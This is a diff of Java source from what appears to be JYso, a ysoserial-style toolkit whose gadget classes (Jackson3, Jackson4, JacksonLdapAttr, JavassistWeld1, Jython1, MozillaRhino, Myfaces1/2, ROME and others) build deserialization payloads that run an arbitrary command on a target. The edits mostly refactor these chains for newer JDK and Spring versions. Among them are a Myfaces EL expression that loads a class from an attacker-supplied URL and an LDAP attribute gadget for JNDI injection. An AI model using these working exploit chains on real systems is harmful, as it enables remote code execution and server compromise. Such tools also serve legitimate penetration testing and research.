|||||||
"org.springframework.aop.framework.DefaultAdvisorChainFactory",
|
"org.springframework.aop.framework.DefaultAdvisorChainFactory",
|
||||||
"private static final long serialVersionUID = " + sUID + "L;");
|
"private static final long serialVersionUID = " + sUID + "L;");
|
||||||
|
|
||||||
Object ctFactory = ctDefaultAdvisorChainFactory.toClass(new SuClassLoader()).newInstance();
|
Object ctFactory = ctDefaultAdvisorChainFactory.toClass(
|
||||||
|
new SuClassLoader(),SuClassLoader.class.getProtectionDomain()
|
||||||
|
).newInstance();
|
||||||
advisedSupport.setAdvisorChainFactory((AdvisorChainFactory) ctFactory);
|
advisedSupport.setAdvisorChainFactory((AdvisorChainFactory) ctFactory);
|
||||||
|
|
||||||
Constructor<?> constructor = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy").getConstructor(AdvisedSupport.class);
|
Constructor<?> constructor = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy").getConstructor(AdvisedSupport.class);
|
||||||
constructor.setAccessible(true);
|
constructor.setAccessible(true);
|
||||||
InvocationHandler handler = (InvocationHandler) constructor.newInstance(advisedSupport);
|
return (InvocationHandler) constructor.newInstance(advisedSupport);
|
||||||
Object proxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Templates.class}, handler);
|
}
|
||||||
|
|
||||||
return proxy;
|
public static Object makeTemplatesImplAopProxy(String cmd) throws Exception {
|
||||||
|
AdvisedSupport advisedSupport = new AdvisedSupport();
|
||||||
|
advisedSupport.setTarget(Gadgets.createTemplatesImpl(cmd));
|
||||||
|
|
||||||
|
InvocationHandler handler = setSuidSource(advisedSupport);
|
||||||
|
|
||||||
|
|
||||||
|
return Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Templates.class}, handler);
|
||||||
}
|
}
|
||||||
|
|
||||||
public static Object makeDatasourceAopProxy(Object templatesImpl) throws Exception {
|
public static Object makeDatasourceAopProxy(Object templatesImpl) throws Exception {
|
||||||
AdvisedSupport advisedSupport = new AdvisedSupport();
|
AdvisedSupport advisedSupport = new AdvisedSupport();
|
||||||
advisedSupport.setTarget(templatesImpl);
|
advisedSupport.setTarget(templatesImpl);
|
||||||
|
|
||||||
//<=6.0.23为6115154060221772279
|
InvocationHandler handler = setSuidSource(advisedSupport);
|
||||||
//>=6.1.0 为273003553246259276
|
|
||||||
String sUID = "273003553246259276";
|
|
||||||
CtClass ctDefaultAdvisorChainFactory = insertField(
|
|
||||||
"org.springframework.aop.framework.DefaultAdvisorChainFactory",
|
|
||||||
"private static final long serialVersionUID = " + sUID + "L;");
|
|
||||||
|
|
||||||
Object ctFactory = ctDefaultAdvisorChainFactory.toClass(new SuClassLoader()).newInstance();
|
return Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{DataSource.class}, handler);
|
||||||
advisedSupport.setAdvisorChainFactory((AdvisorChainFactory) ctFactory);
|
|
||||||
|
|
||||||
Constructor<?> constructor = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy").getConstructor(AdvisedSupport.class);
|
|
||||||
constructor.setAccessible(true);
|
|
||||||
InvocationHandler handler = (InvocationHandler) constructor.newInstance(advisedSupport);
|
|
||||||
Object proxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{DataSource.class}, handler);
|
|
||||||
return proxy;
|
|
||||||
}
|
}
|
||||||
|
|
||||||
public static Object makeAopProxy(String singletonTargetSourceClassName, String advisedSupportClassName, String jdkDynamicAopProxy, Class superClass, Object targetObject) throws Exception {
|
public static Object makeAopProxy(String singletonTargetSourceClassName, String advisedSupportClassName, String jdkDynamicAopProxy, Class superClass, Object targetObject) throws Exception {
|
||||||
@@ -79,8 +74,7 @@ public class Jackson3 implements ObjectPayload<Object> {
|
|||||||
Constructor<?> constructor = ThirdLibsClassLoader.loadClass_(jdkDynamicAopProxy).getConstructor(advisedSupportClazz);
|
Constructor<?> constructor = ThirdLibsClassLoader.loadClass_(jdkDynamicAopProxy).getConstructor(advisedSupportClazz);
|
||||||
constructor.setAccessible(true);
|
constructor.setAccessible(true);
|
||||||
InvocationHandler handler = (InvocationHandler) constructor.newInstance(advisedSupport);
|
InvocationHandler handler = (InvocationHandler) constructor.newInstance(advisedSupport);
|
||||||
Object proxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{superClass}, handler);
|
return Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{superClass}, handler);
|
||||||
return proxy;
|
|
||||||
}
|
}
|
||||||
|
|
||||||
public static Object getEventListenerList(Object obj) throws Exception {
|
public static Object getEventListenerList(Object obj) throws Exception {
|
||||||
@@ -90,7 +84,9 @@ public class Jackson3 implements ObjectPayload<Object> {
|
|||||||
CtClass ctEventListenerList = insertField(
|
CtClass ctEventListenerList = insertField(
|
||||||
"javax.swing.event.EventListenerList",
|
"javax.swing.event.EventListenerList",
|
||||||
"private static final long serialVersionUID = -" + sUID1 + "L;");
|
"private static final long serialVersionUID = -" + sUID1 + "L;");
|
||||||
Object list = ctEventListenerList.toClass(new SuClassLoader()).newInstance();
|
Object list = ctEventListenerList.toClass(
|
||||||
|
new SuClassLoader(),SuClassLoader.class.getProtectionDomain()
|
||||||
|
).newInstance();
|
||||||
|
|
||||||
//>=6.1.0 为-1045223116463488483
|
//>=6.1.0 为-1045223116463488483
|
||||||
//<=6.0.23为-2077529998244066750
|
//<=6.0.23为-2077529998244066750
|
||||||
@@ -98,7 +94,9 @@ public class Jackson3 implements ObjectPayload<Object> {
|
|||||||
CtClass ctUndoManager = insertField(
|
CtClass ctUndoManager = insertField(
|
||||||
"javax.swing.undo.UndoManager",
|
"javax.swing.undo.UndoManager",
|
||||||
"private static final long serialVersionUID = -" + sUID2 + "L;");
|
"private static final long serialVersionUID = -" + sUID2 + "L;");
|
||||||
Object undomanager = ctUndoManager.toClass(new SuClassLoader()).newInstance();
|
Object undomanager = ctUndoManager.toClass(
|
||||||
|
new SuClassLoader(),SuClassLoader.class.getProtectionDomain()
|
||||||
|
).newInstance();
|
||||||
|
|
||||||
//取出UndoManager类的父类CompoundEdit类的edits属性里的vector对象,并把需要触发toString的类add进去。
|
//取出UndoManager类的父类CompoundEdit类的edits属性里的vector对象,并把需要触发toString的类add进去。
|
||||||
Vector vector = (Vector) getFieldValue(undomanager, "edits");
|
Vector vector = (Vector) getFieldValue(undomanager, "edits");
|
||||||
@@ -119,15 +117,6 @@ public class Jackson3 implements ObjectPayload<Object> {
|
|||||||
|
|
||||||
}
|
}
|
||||||
|
|
||||||
//ArrayList<Class> classes = new ArrayList<>();
|
|
||||||
//classes.add(TemplatesImpl.class);
|
|
||||||
//classes.add(POJONode.class);
|
|
||||||
//classes.add(EventListenerList.class);
|
|
||||||
//classes.add(Jackson3.class);
|
|
||||||
//classes.add(Field.class);
|
|
||||||
//classes.add(Method.class);
|
|
||||||
//new jdk17Bypass().bypassModule(classes);
|
|
||||||
|
|
||||||
|
|
||||||
POJONode node = new POJONode(makeTemplatesImplAopProxy(command));
|
POJONode node = new POJONode(makeTemplatesImplAopProxy(command));
|
||||||
|
|
||||||
|
|||||||
@@ -12,10 +12,11 @@ import javassist.CtMethod;
|
|||||||
import java.util.HashMap;
|
import java.util.HashMap;
|
||||||
|
|
||||||
import static com.qi4l.JYso.gadgets.Jackson3.makeTemplatesImplAopProxy;
|
import static com.qi4l.JYso.gadgets.Jackson3.makeTemplatesImplAopProxy;
|
||||||
import static com.qi4l.JYso.gadgets.utils.Utils.makeMap;
|
|
||||||
|
|
||||||
|
|
||||||
//Jackson1链的JDK17改造
|
//Jackson1链的JDK17改造
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"spring-apo:6.2.10"})
|
@Dependencies({"spring-apo:6.2.10"})
|
||||||
@Authors({Authors.QI4L})
|
@Authors({Authors.QI4L})
|
||||||
public class Jackson4 implements ObjectPayload<Object> {
|
public class Jackson4 implements ObjectPayload<Object> {
|
||||||
@@ -38,7 +39,6 @@ public class Jackson4 implements ObjectPayload<Object> {
|
|||||||
map1.put("zZ", xString);
|
map1.put("zZ", xString);
|
||||||
map2.put("yy", xString);
|
map2.put("yy", xString);
|
||||||
map2.put("zZ", node);
|
map2.put("zZ", node);
|
||||||
HashMap hashmap = makeMap(map1, map2);
|
return com.qi4l.JYso.gadgets.utils.Utils.makeMap(map1, map2);
|
||||||
return hashmap;
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -4,6 +4,8 @@ import com.fasterxml.jackson.databind.node.POJONode;
|
|||||||
import javassist.ClassPool;
|
import javassist.ClassPool;
|
||||||
import javassist.CtClass;
|
import javassist.CtClass;
|
||||||
import javassist.CtMethod;
|
import javassist.CtMethod;
|
||||||
|
import org.slf4j.Logger;
|
||||||
|
import org.slf4j.LoggerFactory;
|
||||||
|
|
||||||
import javax.management.BadAttributeValueExpException;
|
import javax.management.BadAttributeValueExpException;
|
||||||
import javax.naming.CompositeName;
|
import javax.naming.CompositeName;
|
||||||
@@ -11,7 +13,10 @@ import javax.naming.directory.BasicAttribute;
|
|||||||
import java.lang.reflect.Constructor;
|
import java.lang.reflect.Constructor;
|
||||||
import java.lang.reflect.Field;
|
import java.lang.reflect.Field;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
public class JacksonLdapAttr implements ObjectPayload<Object> {
|
public class JacksonLdapAttr implements ObjectPayload<Object> {
|
||||||
|
private static final Logger log = LoggerFactory.getLogger(JacksonLdapAttr.class);
|
||||||
|
|
||||||
@Override
|
@Override
|
||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
|
|
||||||
@@ -31,7 +36,7 @@ public class JacksonLdapAttr implements ObjectPayload<Object> {
|
|||||||
|
|
||||||
try {
|
try {
|
||||||
Class clazz = Class.forName("com.sun.jndi.ldap.LdapAttribute");
|
Class clazz = Class.forName("com.sun.jndi.ldap.LdapAttribute");
|
||||||
Constructor clazz_cons = clazz.getDeclaredConstructor(new Class[]{String.class});
|
Constructor clazz_cons = clazz.getDeclaredConstructor(String.class);
|
||||||
clazz_cons.setAccessible(true);
|
clazz_cons.setAccessible(true);
|
||||||
BasicAttribute la = (BasicAttribute) clazz_cons.newInstance(new Object[]{"exp"});
|
BasicAttribute la = (BasicAttribute) clazz_cons.newInstance(new Object[]{"exp"});
|
||||||
Field bcu_fi = clazz.getDeclaredField("baseCtxURL");
|
Field bcu_fi = clazz.getDeclaredField("baseCtxURL");
|
||||||
@@ -50,7 +55,7 @@ public class JacksonLdapAttr implements ObjectPayload<Object> {
|
|||||||
valfield.set(val, node);
|
valfield.set(val, node);
|
||||||
return val;
|
return val;
|
||||||
} catch (Exception e) {
|
} catch (Exception e) {
|
||||||
e.printStackTrace();
|
log.error("e: ", e);
|
||||||
}
|
}
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -17,7 +17,6 @@ import org.jboss.weld.interceptor.spi.instance.InterceptorInstantiator;
|
|||||||
import org.jboss.weld.interceptor.spi.metadata.InterceptorReference;
|
import org.jboss.weld.interceptor.spi.metadata.InterceptorReference;
|
||||||
import org.jboss.weld.interceptor.spi.metadata.MethodMetadata;
|
import org.jboss.weld.interceptor.spi.metadata.MethodMetadata;
|
||||||
import org.jboss.weld.interceptor.spi.model.InterceptionModel;
|
import org.jboss.weld.interceptor.spi.model.InterceptionModel;
|
||||||
import org.jboss.weld.interceptor.spi.model.InterceptionType;
|
|
||||||
|
|
||||||
import java.lang.reflect.Constructor;
|
import java.lang.reflect.Constructor;
|
||||||
import java.util.*;
|
import java.util.*;
|
||||||
@@ -26,7 +25,7 @@ import java.util.*;
|
|||||||
/*
|
/*
|
||||||
by @matthias_kaiser
|
by @matthias_kaiser
|
||||||
*/
|
*/
|
||||||
@SuppressWarnings({"rawtypes", "unchecked"})
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"javassist:javassist:3.12.1.GA", "org.jboss.weld:weld-core:1.1.33.Final",
|
@Dependencies({"javassist:javassist:3.12.1.GA", "org.jboss.weld:weld-core:1.1.33.Final",
|
||||||
"javax.enterprise:cdi-api:1.0-SP1", "javax.interceptor:javax.interceptor-api:3.1",
|
"javax.enterprise:cdi-api:1.0-SP1", "javax.interceptor:javax.interceptor-api:3.1",
|
||||||
"org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final", "org.slf4j:slf4j-api:1.7.21"})
|
"org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final", "org.slf4j:slf4j-api:1.7.21"})
|
||||||
@@ -34,15 +33,29 @@ import java.util.*;
|
|||||||
public class JavassistWeld1 implements ObjectPayload<Object> {
|
public class JavassistWeld1 implements ObjectPayload<Object> {
|
||||||
|
|
||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
final Object tpl;
|
|
||||||
tpl = Gadgets.createTemplatesImpl(command);
|
return get_chain(command, org.jboss.weld.interceptor.spi.model.InterceptionType.POST_ACTIVATE, null);
|
||||||
|
}
|
||||||
|
|
||||||
|
static Object get_chain(
|
||||||
|
String command,
|
||||||
|
org.jboss.weld.interceptor.spi.model.InterceptionType POST_ACTIVATE,
|
||||||
|
org.jboss.interceptor.spi.model.InterceptionType POST_ACTIVATE1
|
||||||
|
) throws Exception {
|
||||||
|
Object tpl = Gadgets.createTemplatesImpl(command);
|
||||||
|
|
||||||
InterceptionModelBuilder builder = InterceptionModelBuilder.newBuilderFor(HashMap.class);
|
InterceptionModelBuilder builder = InterceptionModelBuilder.newBuilderFor(HashMap.class);
|
||||||
ReflectiveClassMetadata metadata = (ReflectiveClassMetadata) ReflectiveClassMetadata.of(HashMap.class);
|
ReflectiveClassMetadata metadata = (ReflectiveClassMetadata) ReflectiveClassMetadata.of(HashMap.class);
|
||||||
InterceptorReference interceptorReference = ClassMetadataInterceptorReference.of(metadata);
|
InterceptorReference interceptorReference = ClassMetadataInterceptorReference.of(metadata);
|
||||||
|
|
||||||
Set<InterceptionType> s = new HashSet<InterceptionType>();
|
Set s = new HashSet<>();
|
||||||
s.add(org.jboss.weld.interceptor.spi.model.InterceptionType.POST_ACTIVATE);
|
|
||||||
|
if (POST_ACTIVATE != null) {
|
||||||
|
s.add(POST_ACTIVATE);
|
||||||
|
} else {
|
||||||
|
s.add(POST_ACTIVATE1);
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
Constructor defaultMethodMetadataConstructor = DefaultMethodMetadata.class.getDeclaredConstructor(Set.class, MethodReference.class);
|
Constructor defaultMethodMetadataConstructor = DefaultMethodMetadata.class.getDeclaredConstructor(Set.class, MethodReference.class);
|
||||||
Reflections.setAccessible(defaultMethodMetadataConstructor);
|
Reflections.setAccessible(defaultMethodMetadataConstructor);
|
||||||
@@ -51,9 +64,14 @@ public class JavassistWeld1 implements ObjectPayload<Object> {
|
|||||||
|
|
||||||
List list = new ArrayList();
|
List list = new ArrayList();
|
||||||
list.add(methodMetadata);
|
list.add(methodMetadata);
|
||||||
Map<org.jboss.weld.interceptor.spi.model.InterceptionType, List<MethodMetadata>> hashMap = new HashMap<org.jboss.weld.interceptor.spi.model.InterceptionType, List<MethodMetadata>>();
|
Map hashMap = new HashMap<>();
|
||||||
|
|
||||||
|
if (POST_ACTIVATE != null) {
|
||||||
|
hashMap.put(POST_ACTIVATE, list);
|
||||||
|
} else {
|
||||||
|
hashMap.put(POST_ACTIVATE1, list);
|
||||||
|
}
|
||||||
|
|
||||||
hashMap.put(org.jboss.weld.interceptor.spi.model.InterceptionType.POST_ACTIVATE, list);
|
|
||||||
SimpleInterceptorMetadata simpleInterceptorMetadata = new SimpleInterceptorMetadata(interceptorReference, true, hashMap);
|
SimpleInterceptorMetadata simpleInterceptorMetadata = new SimpleInterceptorMetadata(interceptorReference, true, hashMap);
|
||||||
|
|
||||||
builder.interceptAll().with(simpleInterceptorMetadata);
|
builder.interceptAll().with(simpleInterceptorMetadata);
|
||||||
@@ -61,19 +79,12 @@ public class JavassistWeld1 implements ObjectPayload<Object> {
|
|||||||
InterceptionModel model = builder.build();
|
InterceptionModel model = builder.build();
|
||||||
|
|
||||||
HashMap map = new HashMap();
|
HashMap map = new HashMap();
|
||||||
map.put("ysoserial", "ysoserial");
|
map.put("qi4l", "qi4l");
|
||||||
|
|
||||||
DefaultInvocationContextFactory factory = new DefaultInvocationContextFactory();
|
DefaultInvocationContextFactory factory = new DefaultInvocationContextFactory();
|
||||||
|
|
||||||
InterceptorInstantiator interceptorInstantiator = new InterceptorInstantiator() {
|
InterceptorInstantiator interceptorInstantiator = paramInterceptorReference -> tpl;
|
||||||
|
|
||||||
public Object createFor(InterceptorReference paramInterceptorReference) {
|
|
||||||
|
|
||||||
return tpl;
|
|
||||||
}
|
|
||||||
};
|
|
||||||
|
|
||||||
return new InterceptorMethodHandler(map, metadata, model, interceptorInstantiator, factory);
|
return new InterceptorMethodHandler(map, metadata, model, interceptorInstantiator, factory);
|
||||||
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -2,6 +2,7 @@ package com.qi4l.JYso.gadgets;
|
|||||||
|
|
||||||
import static com.qi4l.JYso.gadgets.ROMEJDBC.makeJNDIRowSet;
|
import static com.qi4l.JYso.gadgets.ROMEJDBC.makeJNDIRowSet;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
public class JdbcRowSet implements ObjectPayload<Object> {
|
public class JdbcRowSet implements ObjectPayload<Object> {
|
||||||
@Override
|
@Override
|
||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
|
|||||||
@@ -12,7 +12,7 @@ import java.util.LinkedHashSet;
|
|||||||
|
|
||||||
import static com.qi4l.JYso.gadgets.utils.Utils.createProxy;
|
import static com.qi4l.JYso.gadgets.utils.Utils.createProxy;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Authors({"potats0"})
|
@Authors({"potats0"})
|
||||||
public class Jdk7u21variant implements ObjectPayload<Object> {
|
public class Jdk7u21variant implements ObjectPayload<Object> {
|
||||||
|
|
||||||
|
|||||||
@@ -7,7 +7,6 @@ import org.apache.commons.io.FileUtils;
|
|||||||
import org.python.core.*;
|
import org.python.core.*;
|
||||||
|
|
||||||
import java.io.File;
|
import java.io.File;
|
||||||
import java.lang.reflect.InvocationHandler;
|
|
||||||
import java.lang.reflect.Proxy;
|
import java.lang.reflect.Proxy;
|
||||||
import java.math.BigInteger;
|
import java.math.BigInteger;
|
||||||
import java.util.Arrays;
|
import java.util.Arrays;
|
||||||
@@ -37,7 +36,7 @@ import java.util.PriorityQueue;
|
|||||||
* exception information).
|
* exception information).
|
||||||
*/
|
*/
|
||||||
|
|
||||||
@SuppressWarnings({"rawtypes", "unchecked", "restriction"})
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"org.python:jython-standalone:2.5.2"})
|
@Dependencies({"org.python:jython-standalone:2.5.2"})
|
||||||
@Authors({Authors.PWNTESTER, Authors.CSCHNEIDER4711})
|
@Authors({Authors.PWNTESTER, Authors.CSCHNEIDER4711})
|
||||||
public class Jython1 implements ObjectPayload<PriorityQueue> {
|
public class Jython1 implements ObjectPayload<PriorityQueue> {
|
||||||
@@ -91,7 +90,7 @@ public class Jython1 implements ObjectPayload<PriorityQueue> {
|
|||||||
PyFunction handler = new PyFunction(new PyStringMap(), null, codeobj);
|
PyFunction handler = new PyFunction(new PyStringMap(), null, codeobj);
|
||||||
|
|
||||||
// Prepare Trigger Gadget
|
// Prepare Trigger Gadget
|
||||||
Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, (InvocationHandler) handler);
|
Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);
|
||||||
PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
|
PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
|
||||||
Object[] queue = new Object[]{1, 1};
|
Object[] queue = new Object[]{1, 1};
|
||||||
Reflections.setFieldValue(priorityQueue, "queue", queue);
|
Reflections.setFieldValue(priorityQueue, "queue", queue);
|
||||||
|
|||||||
@@ -19,7 +19,7 @@ import java.lang.reflect.Method;
|
|||||||
by @matthias_kaiser
|
by @matthias_kaiser
|
||||||
*/
|
*/
|
||||||
|
|
||||||
@SuppressWarnings({"unused"})
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"rhino:js:1.7R2"})
|
@Dependencies({"rhino:js:1.7R2"})
|
||||||
@Authors({Authors.MATTHIASKAISER})
|
@Authors({Authors.MATTHIASKAISER})
|
||||||
public class MozillaRhino1 implements ObjectPayload<Object> {
|
public class MozillaRhino1 implements ObjectPayload<Object> {
|
||||||
|
|||||||
@@ -44,6 +44,7 @@ import java.util.Map;
|
|||||||
* <p>
|
* <p>
|
||||||
* by @_tint0
|
* by @_tint0
|
||||||
*/
|
*/
|
||||||
|
@SuppressWarnings({"unchecked","unused"})
|
||||||
@Dependencies({"rhino:js:1.7R2"})
|
@Dependencies({"rhino:js:1.7R2"})
|
||||||
@Authors({Authors.TINT0})
|
@Authors({Authors.TINT0})
|
||||||
public class MozillaRhino2 implements ObjectPayload<Object> {
|
public class MozillaRhino2 implements ObjectPayload<Object> {
|
||||||
@@ -56,7 +57,7 @@ public class MozillaRhino2 implements ObjectPayload<Object> {
|
|||||||
@Override
|
@Override
|
||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
ScriptableObject dummyScope = new Environment();
|
ScriptableObject dummyScope = new Environment();
|
||||||
Map<Object, Object> associatedValues = new Hashtable<Object, Object>();
|
Map<Object, Object> associatedValues = new Hashtable<>();
|
||||||
associatedValues.put("ClassCache", Reflections.createWithoutConstructor(ClassCache.class));
|
associatedValues.put("ClassCache", Reflections.createWithoutConstructor(ClassCache.class));
|
||||||
Reflections.setFieldValue(dummyScope, "associatedValues", associatedValues);
|
Reflections.setFieldValue(dummyScope, "associatedValues", associatedValues);
|
||||||
|
|
||||||
|
|||||||
@@ -3,7 +3,6 @@ package com.qi4l.JYso.gadgets;
|
|||||||
import com.qi4l.JYso.gadgets.annotation.Authors;
|
import com.qi4l.JYso.gadgets.annotation.Authors;
|
||||||
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
||||||
import com.qi4l.JYso.gadgets.utils.DynamicDependencies;
|
import com.qi4l.JYso.gadgets.utils.DynamicDependencies;
|
||||||
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
|
||||||
import com.qi4l.JYso.gadgets.utils.Reflections;
|
import com.qi4l.JYso.gadgets.utils.Reflections;
|
||||||
import org.apache.myfaces.context.servlet.FacesContextImpl;
|
import org.apache.myfaces.context.servlet.FacesContextImpl;
|
||||||
import org.apache.myfaces.context.servlet.FacesContextImplBase;
|
import org.apache.myfaces.context.servlet.FacesContextImplBase;
|
||||||
@@ -14,8 +13,6 @@ import org.apache.myfaces.view.facelets.el.ValueExpressionMethodExpression;
|
|||||||
import javax.el.ELContext;
|
import javax.el.ELContext;
|
||||||
import javax.el.ExpressionFactory;
|
import javax.el.ExpressionFactory;
|
||||||
import javax.el.ValueExpression;
|
import javax.el.ValueExpression;
|
||||||
import javax.servlet.ServletContext;
|
|
||||||
import javax.servlet.ServletRequest;
|
|
||||||
import javax.servlet.ServletResponse;
|
import javax.servlet.ServletResponse;
|
||||||
|
|
||||||
import static com.qi4l.JYso.gadgets.utils.Utils.makeMap;
|
import static com.qi4l.JYso.gadgets.utils.Utils.makeMap;
|
||||||
@@ -37,6 +34,8 @@ import static com.qi4l.JYso.gadgets.utils.Utils.makeMap;
|
|||||||
*
|
*
|
||||||
* @author mbechler
|
* @author mbechler
|
||||||
*/
|
*/
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies
|
@Dependencies
|
||||||
@Authors({Authors.MBECHLER})
|
@Authors({Authors.MBECHLER})
|
||||||
public class Myfaces1 implements ObjectPayload<Object>, DynamicDependencies {
|
public class Myfaces1 implements ObjectPayload<Object>, DynamicDependencies {
|
||||||
@@ -65,7 +64,7 @@ public class Myfaces1 implements ObjectPayload<Object>, DynamicDependencies {
|
|||||||
}
|
}
|
||||||
|
|
||||||
public static Object makeExpressionPayload(String expr) throws Exception {
|
public static Object makeExpressionPayload(String expr) throws Exception {
|
||||||
FacesContextImpl fc = new FacesContextImpl((ServletContext) null, (ServletRequest) null, (ServletResponse) null);
|
FacesContextImpl fc = new FacesContextImpl(null, null, (ServletResponse) null);
|
||||||
ELContext elContext = new FacesELContext(new CompositeELResolver(), fc);
|
ELContext elContext = new FacesELContext(new CompositeELResolver(), fc);
|
||||||
Reflections.getField(FacesContextImplBase.class, "_elContext").set(fc, elContext);
|
Reflections.getField(FacesContextImplBase.class, "_elContext").set(fc, elContext);
|
||||||
ExpressionFactory expressionFactory = ExpressionFactory.newInstance();
|
ExpressionFactory expressionFactory = ExpressionFactory.newInstance();
|
||||||
|
|||||||
@@ -2,6 +2,7 @@ package com.qi4l.JYso.gadgets;
|
|||||||
|
|
||||||
import com.qi4l.JYso.gadgets.utils.DynamicDependencies;
|
import com.qi4l.JYso.gadgets.utils.DynamicDependencies;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
public class Myfaces2 implements ObjectPayload<Object>, DynamicDependencies {
|
public class Myfaces2 implements ObjectPayload<Object>, DynamicDependencies {
|
||||||
@Override
|
@Override
|
||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
@@ -15,15 +16,14 @@ public class Myfaces2 implements ObjectPayload<Object>, DynamicDependencies {
|
|||||||
String className = command.substring(sep + 1);
|
String className = command.substring(sep + 1);
|
||||||
|
|
||||||
// based on http://danamodio.com/appsec/research/spring-remote-code-with-expression-language-injection/
|
// based on http://danamodio.com/appsec/research/spring-remote-code-with-expression-language-injection/
|
||||||
String expr = "${request.setAttribute('arr',''.getClass().forName('java.util.ArrayList').newInstance())}";
|
StringBuilder expr = new StringBuilder("${request.setAttribute('arr',''.getClass().forName('java.util.ArrayList').newInstance())}");
|
||||||
|
|
||||||
// if we add fewer than the actual classloaders we end up with a null entry
|
// if we add fewer than the actual classloaders we end up with a null entry
|
||||||
for (int i = 0; i < 100; i++) {
|
for (int i = 0; i < 100; i++) {
|
||||||
expr += "${request.getAttribute('arr').add(request.servletContext.getResource('/').toURI().create('" + url + "').toURL())}";
|
expr.append("${request.getAttribute('arr').add(request.servletContext.getResource('/').toURI().create('").append(url).append("').toURL())}");
|
||||||
}
|
}
|
||||||
expr += "${request.getClass().getClassLoader().newInstance(request.getAttribute('arr')"
|
expr.append("${request.getClass().getClassLoader().newInstance(request.getAttribute('arr')" + ".toArray(request.getClass().getClassLoader().getURLs())).loadClass('").append(className).append("').newInstance()}");
|
||||||
+ ".toArray(request.getClass().getClassLoader().getURLs())).loadClass('" + className + "').newInstance()}";
|
|
||||||
|
|
||||||
return Myfaces1.makeExpressionPayload(expr);
|
return Myfaces1.makeExpressionPayload(expr.toString());
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -27,6 +27,7 @@ import static com.qi4l.JYso.gadgets.utils.Utils.makeMap;
|
|||||||
* @author mbechler
|
* @author mbechler
|
||||||
*/
|
*/
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies("rome:rome:1.0")
|
@Dependencies("rome:rome:1.0")
|
||||||
@Authors({Authors.MBECHLER})
|
@Authors({Authors.MBECHLER})
|
||||||
public class ROME implements ObjectPayload<Object> {
|
public class ROME implements ObjectPayload<Object> {
|
||||||
|
|||||||
@@ -11,6 +11,7 @@ import java.util.Map;
|
|||||||
import static com.qi4l.JYso.gadgets.utils.Utils.makeMap;
|
import static com.qi4l.JYso.gadgets.utils.Utils.makeMap;
|
||||||
import static com.qi4l.JYso.gadgets.utils.Utils.createMap;
|
import static com.qi4l.JYso.gadgets.utils.Utils.createMap;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies("rome:rome:1.0")
|
@Dependencies("rome:rome:1.0")
|
||||||
public class ROME2 implements ObjectPayload<Object> {
|
public class ROME2 implements ObjectPayload<Object> {
|
||||||
@Override
|
@Override
|
||||||
|
|||||||
@@ -9,6 +9,7 @@ import com.sun.syndication.feed.impl.ObjectBean;
|
|||||||
import javax.management.BadAttributeValueExpException;
|
import javax.management.BadAttributeValueExpException;
|
||||||
import javax.xml.transform.Templates;
|
import javax.xml.transform.Templates;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Authors({"Firebasky"})
|
@Authors({"Firebasky"})
|
||||||
@Dependencies("rome:rome:1.0")
|
@Dependencies("rome:rome:1.0")
|
||||||
public class ROME3 implements ObjectPayload<Object> {
|
public class ROME3 implements ObjectPayload<Object> {
|
||||||
|
|||||||
@@ -7,7 +7,7 @@ import com.sun.rowset.JdbcRowSetImpl;
|
|||||||
|
|
||||||
import static com.qi4l.JYso.gadgets.utils.Utils.makeMap;
|
import static com.qi4l.JYso.gadgets.utils.Utils.makeMap;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
public class ROMEJDBC implements ObjectPayload<Object> {
|
public class ROMEJDBC implements ObjectPayload<Object> {
|
||||||
// Assuming JDKUtil class with makeJNDIRowSet method
|
